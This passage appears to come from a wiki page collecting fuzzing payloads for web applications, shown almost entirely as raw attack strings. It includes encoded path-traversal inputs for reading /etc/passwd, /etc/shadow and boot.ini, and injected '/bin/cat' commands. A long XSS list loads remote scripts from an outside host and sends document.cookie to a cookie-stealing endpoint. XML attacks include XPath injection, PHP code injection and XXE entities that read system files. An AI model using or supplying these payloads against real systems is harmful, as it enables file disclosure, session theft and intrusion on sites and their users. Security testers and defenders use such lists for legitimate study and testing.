%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%2e%2e%2f%2e%2e%2f%65%74%63%2f%70%61%73%73%77%64<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%36%35%%37%34%%36%33%%32%66%%37%30%%36%31%%37%33%%37%33%%37%37%%36%34<br />
../../../.htaccess<br />
../../.htaccess<br />
../.htaccess<br />
.htaccess<br />
././.htaccess<br />
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%2e%68%74%61%63%63%65%73%73<br />
%2e%2f%2e%2f%2e%68%74%61%63%63%65%73%73<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
%%32%65%%32%66%%32%65%%32%66%%32%65%%36%38%%37%34%%36%31%%36%33%%36%33%%36%35%%37%33%%37%33<br />
../../../../../../../../../../../../etc/hosts%00<br />
../../../../../../../../../../../../etc/hosts<br />
../../boot.ini<br />
/../../../../../../../../%2A<br />
../../../../../../../../../../../../etc/passwd%00<br />
../../../../../../../../../../../../etc/passwd<br />
../../../../../../../../../../../../etc/shadow%00<br />
../../../../../../../../../../../../etc/shadow<br />
/../../../../../../../../../../etc/passwd^^<br />
/../../../../../../../../../../etc/shadow^^<br />
/../../../../../../../../../../etc/passwd<br />
/../../../../../../../../../../etc/shadow<br />
/./././././././././././etc/passwd<br />
/./././././././././././etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow<br />
/..\../..\../..\../..\../..\../..\../etc/passwd<br />
/..\../..\../..\../..\../..\../..\../etc/shadow<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd<br />
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow<br />
\..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
\..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
..\..\..\..\..\..\..\..\..\..\etc\passwd%00<br />
..\..\..\..\..\..\..\..\..\..\etc\shadow%00<br />
%0a/bin/cat%20/etc/passwd<br />
%0a/bin/cat%20/etc/shadow<br />
%00/etc/passwd%00<br />
%00/etc/shadow%00<br />
%00../../../../../../etc/passwd<br />
%00../../../../../../etc/shadow<br />
/../../../../../../../../../../../etc/passwd%00.jpg<br />
/../../../../../../../../../../../etc/passwd%00.html<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd<br />
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00<br />
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%<br />
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..winnt/desktop.ini<br />
\\&amp;apos;/bin/cat%20/etc/passwd\\&amp;apos;<br />
\\&amp;apos;/bin/cat%20/etc/shadow\\&amp;apos;<br />
../../../../../../../../conf/server.xml<br />
/../../../../../../../../bin/id|<br />
C:/inetpub/wwwroot/global.asa<br />
C:\inetpub\wwwroot\global.asa<br />
C:/boot.ini<br />
C:\boot.ini<br />
../../../../../../../../../../../../localstart.asp%00<br />
../../../../../../../../../../../../localstart.asp<br />
../../../../../../../../../../../../boot.ini%00<br />
../../../../../../../../../../../../boot.ini<br />
/./././././././././././boot.ini<br />
/../../../../../../../../../../../boot.ini%00<br />
/../../../../../../../../../../../boot.ini<br />
/..\../..\../..\../..\../..\../..\../boot.ini<br />
/.\\./.\\./.\\./.\\./.\\./.\\./boot.ini<br />
\..\..\..\..\..\..\..\..\..\..\boot.ini<br />
..\..\..\..\..\..\..\..\..\..\boot.ini%00<br />
..\..\..\..\..\..\..\..\..\..\boot.ini<br />
/../../../../../../../../../../../boot.ini%00.html<br />
/../../../../../../../../../../../boot.ini%00.jpg<br />
/.../.../.../.../.../<br />
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini<br />
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/boot.ini<br />
</pre> <br />
''Sorry for breaking the layout - but "breaking the layout" could become "breaking the software".'' <br />
<br />
=== XSS Discovery Statements ===<br />
<br />
Discovery Statements<br />
<pre># Discovery Statements (July 2007)<br />
# Statements used to cause exploitable errors<br />
# Foobar@email.de<br />
<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--&gt;&lt;/SCRIPT&gt;"&gt;'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt; <br />
'';!--"&lt;XSS&gt;=&amp;{()}<br />
</pre> <br />
<br />
Common exploit code <br />
<pre># Best Statements (July 2007)<br />
# Statements covering 90% of all vulnerabilities <br />
# Foobar@email.de<br />
<br />
'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt='<br />
"&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt="<br />
\'&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;&lt;img src="" alt=\'<br />
'); alert('xss'); var x='<br />
\\'); alert(\'xss\');var x=\'<br />
//--&gt;&lt;/SCRIPT&gt;&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83));<br />
</pre><br />
<br />
Full List - (Update: 11 August 2009 - Total Statements: 162) <br />
<pre># Full List (July 2007)<br />
# All Statements - Full List <br />
# Based on the XSS cheat sheet <br />
# http://ha.ckers.org/xss.html<br />
# Foobar@email.de<br />
<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS');""&gt;"<br />
&lt;IMG SRC=JaVaScRiPt:alert('XSS')&gt;<br />
"&lt;IMG SRC=javascript:alert(""XSS"")&gt;"<br />
"&lt;IMG SRC=`javascript:alert(""RSnake says, 'XSS'"")`&gt;"<br />
"&lt;IMG """"""&gt;&lt;SCRIPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
"&lt;IMG SRC=""jav"<br />
"ascript:alert('XSS');""&gt;"<br />
"perl -e 'print ""&lt;IMG SRC=java\0script:alert(\""XSS\"")&gt;"";' &gt; out"<br />
"perl -e 'print ""&lt;SCR\0IPT&gt;alert(\""XSS\"")&lt;/SCR\0IPT&gt;"";' &gt; out"<br />
"&lt;IMG SRC="" &amp;#14; javascript:alert('XSS');""&gt;"<br />
"&lt;SCRIPT/XSS SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;BODY onload!#$%&amp;()*~+-_.,:;?@[/|\]^`=alert(""XSS"")&gt;"<br />
"&lt;SCRIPT/SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;&lt;SCRIPT&gt;alert(""XSS"");//&lt;&lt;/SCRIPT&gt;"<br />
&lt;SCRIPT SRC=http://ha.ckers.org/xss.js?&lt;B&gt;<br />
&lt;SCRIPT SRC=//ha.ckers.org/.j&gt;<br />
"&lt;IMG SRC=""javascript:alert('XSS')"""<br />
&lt;iframe src=http://ha.ckers.org/scriptlet.html &lt;<br />
&lt;SCRIPT&gt;a=/XSS/\nalert(a.source)&lt;/SCRIPT&gt;<br />
"\"";alert('XSS');//"<br />
"&lt;/TITLE&gt;&lt;SCRIPT&gt;alert(""XSS"");&lt;/SCRIPT&gt;"<br />
"&lt;INPUT TYPE=""IMAGE"" SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BODY BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
&lt;BODY ONLOAD=alert('XSS')&gt;<br />
"&lt;IMG DYNSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;IMG LOWSRC=""javascript:alert('XSS')""&gt;"<br />
"&lt;BGSOUND SRC=""javascript:alert('XSS');""&gt;"<br />
"&lt;BR SIZE=""&amp;{alert('XSS')}""&gt;"<br />
"&lt;LAYER SRC=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/LAYER&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""javascript:alert('XSS');""&gt;"<br />
"&lt;LINK REL=""stylesheet"" HREF=""http://ha.ckers.org/xss.css""&gt;"<br />
&lt;STYLE&gt;@import'http://ha.ckers.org/xss.css';&lt;/STYLE&gt;<br />
"&lt;META HTTP-EQUIV=""Link"" Content=""&lt;http://ha.ckers.org/xss.css&gt;; REL=stylesheet""&gt;"<br />
"&lt;STYLE&gt;BODY{-moz-binding:url(""http://ha.ckers.org/xssmoz.xml#xss"")}&lt;/STYLE&gt;"<br />
"&lt;XSS STYLE=""behavior: url(xss.htc);""&gt;"<br />
"&lt;STYLE&gt;li {list-style-image: url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;UL&gt;&lt;LI&gt;XSS"<br />
"&lt;IMG SRC='vbscript:msgbox(""XSS"")'&gt;"<br />
¼script¾alert(¢XSS¢)¼/script¾<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=javascript:alert('XSS');""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K""&gt;"<br />
"&lt;META HTTP-EQUIV=""refresh"" CONTENT=""0; URL=http://;URL=javascript:alert('XSS');""&gt;"<br />
"&lt;IFRAME SRC=""javascript:alert('XSS');""&gt;&lt;/IFRAME&gt;"<br />
"&lt;FRAMESET&gt;&lt;FRAME SRC=""javascript:alert('XSS');""&gt;&lt;/FRAMESET&gt;"<br />
"&lt;TABLE BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;TABLE&gt;&lt;TD BACKGROUND=""javascript:alert('XSS')""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029""&gt;"<br />
"&lt;DIV STYLE=""background-image: url(&amp;#1;javascript:alert('XSS'))""&gt;"<br />
"&lt;DIV STYLE=""width: expression(alert('XSS'));""&gt;"<br />
"&lt;STYLE&gt;@im\port'\ja\vasc\ript:alert(""XSS"")';&lt;/STYLE&gt;"<br />
"&lt;IMG STYLE=""xss:expr/*XSS*/ession(alert('XSS'))""&gt;"<br />
"&lt;XSS STYLE=""xss:expression(alert('XSS'))""&gt;"<br />
"exp/*&lt;A STYLE='no\xss:noxss(""*//*"");xss:ex/*XSS*//*/*/pression(alert(""XSS""))'&gt;"<br />
"&lt;STYLE TYPE=""text/javascript""&gt;alert('XSS');&lt;/STYLE&gt;"<br />
"&lt;STYLE&gt;.XSS{background-image:url(""javascript:alert('XSS')"");}&lt;/STYLE&gt;&lt;A CLASS=XSS&gt;&lt;/A&gt;"<br />
"&lt;STYLE type=""text/css""&gt;BODY{background:url(""javascript:alert('XSS')"")}&lt;/STYLE&gt;"<br />
&lt;!--[if gte IE 4]&gt;&lt;SCRIPT&gt;alert('XSS');&lt;/SCRIPT&gt;&lt;![endif]--&gt;<br />
"&lt;BASE HREF=""javascript:alert('XSS');//""&gt;"<br />
"&lt;OBJECT TYPE=""text/x-scriptlet"" DATA=""http://ha.ckers.org/scriptlet.html""&gt;&lt;/OBJECT&gt;"<br />
&lt;OBJECT classid=clsid:ae24fdae-03c6-11d1-8b76-0080c744f389&gt;&lt;param name=url value=javascript:alert('XSS')&gt;&lt;/OBJECT&gt;<br />
"&lt;EMBED SRC=""http://ha.ckers.org/xss.swf"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;EMBED SRC=""data:image/svg+xml;base64,PHN2ZyB4bWxuczpzdmc9Imh0dH A6Ly93d3cudzMub3JnLzIwMDAvc3ZnIiB4bWxucz0iaHR0cDovL3d3dy53My5vcmcv MjAwMC9zdmciIHhtbG5zOnhsaW5rPSJodHRwOi8vd3d3LnczLm9yZy8xOTk5L3hs aW5rIiB2ZXJzaW9uPSIxLjAiIHg9IjAiIHk9IjAiIHdpZHRoPSIxOTQiIGhlaWdodD0iMjAw IiBpZD0ieHNzIj48c2NyaXB0IHR5cGU9InRleHQvZWNtYXNjcmlwdCI+YWxlcnQoIlh TUyIpOzwvc2NyaXB0Pjwvc3ZnPg=="" type=""image/svg+xml"" AllowScriptAccess=""always""&gt;&lt;/EMBED&gt;"<br />
"&lt;HTML xmlns:xss&gt;&lt;?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""&gt;&lt;xss:xss&gt;XSS&lt;/xss:xss&gt;&lt;/HTML&gt;"<br />
"&lt;XML ID=I&gt;&lt;X&gt;&lt;C&gt;&lt;![CDATA[&lt;IMG SRC=""javas]]&gt;&lt;![CDATA[cript:alert('XSS');""&gt;]]&gt;&lt;/C&gt;&lt;/X&gt;&lt;/xml&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;XML ID=""xss""&gt;&lt;I&gt;&lt;B&gt;&lt;IMG SRC=""javas&lt;!-- --&gt;cript:alert('XSS')""&gt;&lt;/B&gt;&lt;/I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""&gt;&lt;/SPAN&gt;"<br />
"&lt;XML SRC=""xsstest.xml"" ID=I&gt;&lt;/XML&gt;&lt;SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML&gt;&lt;/SPAN&gt;"<br />
"&lt;HTML&gt;&lt;BODY&gt;&lt;?xml:namespace prefix=""t"" ns=""urn:schemas-microsoft-com:time""&gt;&lt;?import namespace=""t"" implementation=""#default#time2""&gt;&lt;t:set attributeName=""innerHTML"" to=""XSS&lt;SCRIPT DEFER&gt;alert(""XSS"")&lt;/SCRIPT&gt;""&gt;&lt;/BODY&gt;&lt;/HTML&gt;"<br />
"&lt;SCRIPT SRC=""http://ha.ckers.org/xss.jpg""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;!--#exec cmd=""/bin/echo '&lt;SCR'""--&gt;&lt;!--#exec cmd=""/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js&gt;&lt;/SCRIPT&gt;'""--&gt;"<br />
"&lt;? echo('&lt;SCR)';echo('IPT&gt;alert(""XSS"")&lt;/SCRIPT&gt;');&nbsp;?&gt;"<br />
"&lt;META HTTP-EQUIV=""Set-Cookie"" Content=""USERID=&lt;SCRIPT&gt;alert('XSS')&lt;/SCRIPT&gt;""&gt;"<br />
"&lt;HEAD&gt;&lt;META HTTP-EQUIV=""CONTENT-TYPE"" CONTENT=""text/html; charset=UTF-7""&gt; &lt;/HEAD&gt;+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-"<br />
"&lt;SCRIPT a=""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT =""&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;"" '' SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT ""a='&gt;'"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=`&gt;` SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT a=""&gt;'&gt;"" SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;SCRIPT&gt;document.write(""&lt;SCRI"");&lt;/SCRIPT&gt;PT SRC=""http://ha.ckers.org/xss.js""&gt;&lt;/SCRIPT&gt;"<br />
"&lt;A HREF=""http://66.102.7.147/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://%77%77%77%2E%67%6F%6F%67%6C%65%2E%63%6F%6D""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://1113982867/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0x42.0x0000066.0x7.0x93/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://0102.0146.0007.00000223/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""h\ntt\tp://6"<br />
"&lt;A HREF=""//www.google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""//google""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://google.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.google.com./""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""javascript:document.location='http://www.google.com/'""&gt;XSS&lt;/A&gt;"<br />
"&lt;A HREF=""http://www.gohttp://www.google.com/ogle.com/""&gt;XSS&lt;/A&gt;"<br />
"&lt;div onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;input type=""image"" dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;bgsound src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;{document.write(""XSS-XSS-XSS"");};"<br />
"&lt;img src=&amp;{document.write(""XSS-XSS-XSS"");};&gt;"<br />
"&lt;link rel=""stylesheet"" href=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;iframe src=""vbscript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""livescript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;a href=""about:&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;""&gt;"<br />
"&lt;meta http-equiv=""refresh"" content=""0;url=javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;body onload=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""background-image: url(javascript:document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;div style=""behaviour: url([link to code]);""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt;"<br />
"&lt;div style=""width: expression(document.write(""XSS-XSS-XSS""););""&gt;"<br />
"&lt;style type=""text/javascript""&gt;document.write(""XSS-XSS-XSS"");&lt;/style&gt;"<br />
"&lt;object classid=""clsid:..."" codebase=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;style&gt;&lt;!--&lt;/style&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;![CDATA[&lt;!--]]&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");//--&gt;&lt;/script&gt;"<br />
"&lt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""blah""onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img src=""blah&gt;"" onmouseover=""document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div datafld=""b"" dataformatas=""html"" datasrc=""#X""&gt;&lt;/div&gt;"<br />
"&lt;a href=""javascript#document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;img dynsrc=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&amp;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;"<br />
"&lt;img src=""mocha:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;div style=""binding: url([link to code]);""&gt; [Mozilla]"<br />
"&lt;!-- -- --&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;&lt;!-- -- --&gt;"<br />
"&lt;xml src=""javascript:document.write(""XSS-XSS-XSS"");""&gt;"<br />
"&lt;xml id=""X""&gt;&lt;a&gt;&lt;b&gt;&lt;script&gt;document.write(""XSS-XSS-XSS"");&lt;/script&gt;;&lt;/b&gt;&lt;/a&gt;&lt;/xml&gt;"<br />
"[\xC0][\xBC]script&gt;document.write(""XSS-XSS-XSS"");[\xC0][\xBC]/script&gt;"<br />
&gt;&lt;script&gt;<br />
"&lt;script&gt;alert(""WXSS"")&lt;/script&gt;"<br />
"&lt;&lt;script&gt;alert(""WXSS"");//&lt;&lt;/script&gt;"<br />
&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie)&lt;/script&gt;<br />
'&gt;&lt;script&gt;alert(document.cookie);&lt;/script&gt;<br />
"%3cscript%3ealert(""WXSS"");%3c/script%3e"<br />
%3cscript%3ealert(document.cookie);%3c%2fscript%3e<br />
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E<br />
&amp;ltscript&amp;gtalert(document.cookie);&lt;/script&gt;<br />
&amp;ltscript&amp;gtalert(document.cookie);&amp;ltscript&amp;gtalert<br />
&lt;xss&gt;&lt;script&gt;alert('WXSS')&lt;/script&gt;&lt;/vulnerable&gt;<br />
&lt;IMG%20SRC='javascript:alert(document.cookie)'&gt;<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""javascript:alert('WXSS')"""<br />
&lt;IMG%20SRC=JaVaScRiPt:alert('WXSS')&gt;<br />
&lt;IMG%20SRC=javascript:alert("WXSS")&gt;<br />
"&lt;IMG%20SRC=`javascript:alert(""'WXSS'"")`&gt;"<br />
"&lt;IMG%20""""""&gt;&lt;SCRIPT&gt;alert(""WXSS"")&lt;/SCRIPT&gt;""&gt;"<br />
&lt;IMG%20SRC=javascript:alert(String.fromCharCode(88,83,83))&gt;<br />
&lt;IMG%20SRC='javasc<br />
"&lt;IMG%20SRC=""jav"<br />
"&lt;IMG%20SRC=""jav ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""jav<br />
ascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20SRC=""%20&amp;#14;%20javascript:alert('WXSS');""&gt;"<br />
"&lt;IMG%20DYNSRC=""javascript:alert('WXSS')""&gt;"<br />
"&lt;IMG%20LOWSRC=""javascript:alert('WXSS')""&gt;"<br />
&lt;IMG%20SRC='%26%23x6a;avasc%26%23000010ript:a%26%23x6c;ert(document.%26%23x63;ookie)'&gt;<br />
&lt;IMG%20SRC=javascript:alert('XSS')&gt;<br />
&lt;IMG%20SRC=&amp;#0000106&amp;#0000097&amp;#0000118&amp;#0000097&amp;#0000115&amp;#0000099&amp;#0000114&amp;#0000105&amp;#0000112&amp;#0000116&amp;#0000058&amp;#0000097&amp;#0000108&amp;#0000101&amp;#0000114&amp;#0000116&amp;#0000040&amp;#0000039&amp;#0000088&amp;#0000083&amp;#0000083&amp;#0000039&amp;#0000041&gt;<br />
&lt;IMG%20SRC=&amp;#x6A&amp;#x61&amp;#x76&amp;#x61&amp;#x73&amp;#x63&amp;#x72&amp;#x69&amp;#x70&amp;#x74&amp;#x3A&amp;#x61&amp;#x6C&amp;#x65&amp;#x72&amp;#x74&amp;#x28&amp;#x27&amp;#x58&amp;#x53&amp;#x53&amp;#x27&amp;#x29&gt;<br />
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E<br />
"&gt;&lt;script&gt;document.location='http://cookieStealer/cgi-bin/cookie.cgi?'+document.cookie&lt;/script&gt;<br />
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E<br />
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//;alert(String.fromCharCode(88,83,83))//\;alert(String.fromCharCode(88,83,83))//&gt;&lt;/SCRIPT&gt;!--&lt;SCRIPT&gt;alert(String.fromCharCode(88,83,83))&lt;/SCRIPT&gt;=&amp;{}<br />
'';!--&lt;XSS&gt;=&amp;{()}"<br />
</pre> <br />
<br><br />
<br />
=== XML Attacks - (Update: 11 August 2009 - Total Statements: 15) ===<br />
<pre>Statements<br />
count(/child::node())<br />
x' or name()='username' or 'x'='y<br />
&lt;name&gt;','')); phpinfo(); exit;/*&lt;/name&gt;<br />
&lt;![CDATA[&lt;script&gt;var n=0;while(true){n++;}&lt;/script&gt;]]&gt;<br />
&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[&lt;]]&gt;SCRIPT&lt;![CDATA[&gt;]]&gt;alert('XSS');&lt;![CDATA[&lt;]]&gt;/SCRIPT&lt;![CDATA[&gt;]]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;foo&gt;&lt;![CDATA[' or 1=1 or ''=']]&gt;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file://c:/boot.ini""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
"&lt;?xml version=""1.0"" encoding=""ISO-8859-1""?&gt;&lt;!DOCTYPE foo [&lt;!ELEMENT foo ANY&gt;&lt;!ENTITY xxe SYSTEM ""file:////etc/passwd""&gt;]&gt;&lt;foo&gt;&amp;xxe;&lt;/foo&gt;"<br />
